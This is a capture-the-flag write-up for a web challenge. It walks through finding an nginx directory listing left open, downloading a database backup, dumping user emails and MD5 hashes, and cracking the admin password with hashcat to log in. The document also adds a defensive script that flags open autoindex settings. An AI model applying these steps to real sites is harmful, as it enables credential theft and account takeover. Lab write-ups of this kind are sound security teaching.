Description
Can you find a way to login as the administrator of the website and free nginxatsu?
Solution
Looking at the provided URL 167.172.56.232:31642, we see the following:
Default page when accessing the provided URL
As we don't have any valid credentials, we can simply create a new user and log in.
Once logged in, we are prompted with a configuration page. Apparently we are able to create our own nginx configuration.
nginx configuration generator page
Without modifying anything, I hit the Generate Config button to see what happens. A new config appears! Looking at the config, we see the following:
Snippet of the nginx configuration generator’s default output
The config reveals something very interesting: autoindex for /storage is set to on. This means that directory listing is enabled, so we can see all files in this directory in our browser. The comment is also very suspicious. It is more or less already telling us: *Go there and you will find a secret*.
# We sure hope so that we don't spill any secrets
# within the open directory on /storage
location /storage {
    autoindex on;
}
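From the defender's side, this setting can be caught before a config is deployed. The following is an added example, not part of the original write-up or the challenge's code: it parses an nginx config and lists every location where autoindex is effectively on, including nested locations that inherit it. The server block and the nested locations in SAMPLE are constructed around the snippet above.

```python
import re

# Constructed sample: the /storage block from the write-up inside an assumed server block.
SAMPLE = """
server {
    listen 80;
    location / { try_files $uri $uri/ =404; }
    # We sure hope so that we don't spill any secrets
    # within the open directory on /storage
    location /storage {
        autoindex on;
        location /storage/private { autoindex off; }
        location /storage/logs { }
    }
}
"""

def parse(conf):
    """Parse nginx config text into a tree of blocks, recording each block's own autoindex."""
    conf = re.sub(r"#[^\n]*", "", conf)  # strip comments (a '#' inside quotes is not handled)
    root = {"name": "main", "autoindex": None, "children": []}
    stack, stmt = [root], []
    for tok in re.findall(r"[{};]|[^\s{};]+", conf):
        if tok == "{":  # block opens: the pending words are its header
            node = {"name": " ".join(stmt), "autoindex": None, "children": []}
            stack[-1]["children"].append(node)
            stack.append(node)
        elif tok == "}":  # block closes; never pop the root on stray braces
            if len(stack) > 1:
                stack.pop()
        elif tok == ";":  # directive ends: record autoindex on the enclosing block
            if len(stmt) == 2 and stmt[0] == "autoindex":
                stack[-1]["autoindex"] = stmt[1]
        else:
            stmt.append(tok)
            continue
        stmt = []
    return root

def open_listings(node, inherited="off"):
    """Return the location blocks where autoindex is effectively on."""
    effective = node["autoindex"] or inherited  # default is off; unset blocks inherit
    is_location = node["name"].startswith("location")
    hits = [node["name"]] if effective == "on" and is_location else []
    for child in node["children"]:
        hits += open_listings(child, effective)
    return hits

if __name__ == "__main__":
    print(open_listings(parse(SAMPLE)))
```

Because the tree is resolved after parsing, a server-level `autoindex on;` is reported for every location that does not override it, wherever the directive appears in the block.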
So, let’s have a look at the storage directory.
Listing of the /storage directory displayed in the browser.
Hmmmm a lot of files! But wait! There is a file called v1_db_backup_1604123342.tar.gz. That seems off. Let’s download and inspect it on our local machine.
After we use tar to unpack it, we can use sqlite3 to take a look at the database.
┌──(kali㉿kali)-[~/…/challenges/web/baby_nginxatsu/database]
└─$ sqlite3 database.sqlite
sqlite> .tables
failed_jobs nginx_configs users
migrations password_resets
sqlite> PRAGMA table_info(users);
0|id|INTEGER|1||1
1|name|varchar|1||0
2|email|varchar|1||0
3|password|varchar|1||0
4|api_token|varchar|1||0
5|remember_token|varchar|0||0
6|created_at|datetime|0||0
7|updated_at|datetime|0||0
sqlite> select email,password from users;
nginxatsu-adm-01@makelarid.es|e7816e9a10590b1e33b87ec2fa65e6cd
nginxatsu-giv@makelarid.es|22d94e7c519d6074c57789674cc9959b
nginxatsu-me0wth@makelarid.es|1ae9603761473a3e375812989f9511db
There we go! We have 3 emails and 3 password hashes which look pretty much like MD5 hashes. I copied all of the hashes into a text file and used hashcat to crack them.
┌──(kali㉿kali)-[~/…/challenges/web/baby_nginxatsu/database]
└─$ hashcat -m 0 hashes /usr/share/wordlists/rockyou.txt
e7816e9a10590b1e33b87ec2fa65e6cd:adminadmin1
Recovered........: 1/3 (33.33%) Digests
Great! We found a password. The cracked password hash belongs to the email nginxatsu-adm-01@makelarid.es. So now let’s use those credentials to log in.
Flag displayed on the configuration page, once logged in with the obtained credentials.
And there’s the flag!